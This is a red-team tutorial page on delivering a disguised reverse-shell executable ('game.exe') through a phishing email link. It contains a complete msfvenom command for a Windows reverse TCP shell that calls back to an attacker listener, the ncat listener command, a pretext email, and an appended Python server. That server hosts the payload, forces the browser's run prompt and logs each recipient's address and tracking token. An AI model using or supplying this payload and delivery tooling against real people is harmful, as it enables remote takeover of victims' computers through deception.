Red Team Notes
Binaries

Delivering a raw executable is far less common than it once was, but it remains a clear illustration of how a user who downloads and runs an EXE hands the attacker a foothold on the machine.


Last updated 5 years ago


This is an older technique and not widely used at the time of writing, but it has been effective in the past.

The demonstration uses a short, conversational email that contains a link to the executable rather than attaching it. Because the binary never passes through the mail provider, its attachment scanning never sees the file; the link simply gives the user a prompt to run or save it. Note that link-scanning services which follow URLs at delivery time can still retrieve and detonate the file, and the download itself is visible to any web proxy in the path.

The binary is generated with msfvenom using the command below: a 64-bit reverse TCP shell calling back to 192.168.56.103 on port 1337, wrapped in a standard EXE. msfvenom output is extremely well known to antivirus vendors, so the chance of detection is very high. The --encoder x64/xor --iterations 9 options only transform the shellcode, not the executable template it is embedded in, so they do little against signature detection; obfuscation, packing and similar techniques would be needed for evasion in practice. The same file could equally be delivered as an attachment.

msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=192.168.56.103 LPORT=1337 --encoder x64/xor --iterations 9 --format exe --out game.exe

The binary must be hosted on a server we control so that the link resolves. For this simple demo a Python HTTP server (python3 -m http.server, run from the directory containing game.exe) is enough; the link in the email points at that server and the file downloads as soon as the user opens it.

The email itself is a short message asking the user to download a new game so that we can play online. The user opens the mail.

Clicking the link produces a prompt to Run or Save the file; for this demonstration the user runs the EXE directly.

The file executes.

On the attacking machine a listener is set up with ncat (for example ncat -lvnp 1337, matching the LPORT above; any listener will do, there are many alternatives).
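The hosting step above uses a bare python -m http.server, which serves anything in the directory and records nothing beyond its console output. The following is an added example, not code from the original notes: a small Python server that hosts only the payload, sends the Content-Type and Content-Disposition headers that cause the browser to offer the Run/Save prompt instead of rendering the response, records which client fetched the file (address, User-Agent, and a per-recipient token in the link), and refuses to serve anything that does not start with the PE "MZ" header so a wrong or truncated build is caught before the email goes out. It assumes the file is named game.exe as in the msfvenom --out option; the payload bytes in the __main__ block are a constructed stand-in so the script runs without msfvenom.

```python
import hashlib
import threading
import urllib.request
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlparse

DOWNLOAD_NAME = "game.exe"  # assumption: the --out name used with msfvenom


def sha256_hex(data: bytes) -> str:
    """Fingerprint of the hosted bytes, to compare against the msfvenom output."""
    return hashlib.sha256(data).hexdigest()


def is_pe(data: bytes) -> bool:
    """Cheap sanity check before hosting: a Windows PE file starts with the
    'MZ' DOS header. Catches serving the wrong file or a truncated build."""
    return data[:2] == b"MZ"


def delivery_link(host: str, port: int, token: str) -> str:
    """The URL that goes into the email. The token lets the hit log tell
    recipients apart when the same link is sent to several people."""
    return f"http://{host}:{port}/{DOWNLOAD_NAME}?t={token}"


class DownloadHandler(BaseHTTPRequestHandler):
    payload = b""   # bound per server by make_server()
    hits = None     # list of dicts, one entry per download

    def do_GET(self):
        url = urlparse(self.path)
        if url.path != "/" + DOWNLOAD_NAME:
            self.send_error(404)  # serve nothing else from this host
            return
        token = parse_qs(url.query).get("t", [""])[0]
        self.hits.append({
            "time": datetime.now(timezone.utc).isoformat(),
            "client": self.client_address[0],
            "user_agent": self.headers.get("User-Agent", ""),
            "token": token,
        })
        self.send_response(200)
        # octet-stream plus an attachment disposition is what makes the
        # browser offer Run/Save instead of trying to display the body.
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Disposition",
                         f'attachment; filename="{DOWNLOAD_NAME}"')
        self.send_header("Content-Length", str(len(self.payload)))
        self.end_headers()
        self.wfile.write(self.payload)

    def log_message(self, fmt, *args):
        pass  # the hits list is the record; keep stdout quiet


def make_server(payload: bytes, host: str = "127.0.0.1",
                port: int = 0) -> ThreadingHTTPServer:
    """Serve `payload` from a background thread. port=0 picks a free port;
    the bound address is available as server.server_address."""
    if not is_pe(payload):
        raise ValueError("refusing to host: not a PE file (no MZ header)")
    handler = type("BoundHandler", (DownloadHandler,),
                   {"payload": payload, "hits": []})
    server = ThreadingHTTPServer((host, port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(url: str):
    """Pull the link the way a victim's browser would and return
    (status, headers, body), to verify the prompt-inducing headers."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.status, dict(resp.headers), resp.read()


if __name__ == "__main__":
    # Real use: payload = open("game.exe", "rb").read()
    # Constructed stand-in so this runs without msfvenom: a bare MZ stub.
    payload = b"MZ" + b"\x00" * 62
    server = make_server(payload, port=8000)
    host, port = server.server_address
    print("sha256:", sha256_hex(payload))
    print("send this:", delivery_link(host, port, "alice"))
    try:
        threading.Event().wait()  # serve until Ctrl-C
    except KeyboardInterrupt:
        server.shutdown()
```

Run it from the directory holding the msfvenom output, paste the printed link into the email, and read server.RequestHandlerClass.hits (or print it on shutdown) to see who fetched the file and from which address. Compare the printed sha256 with the hash of the generated game.exe so the hosted bytes are known to be the ones you built.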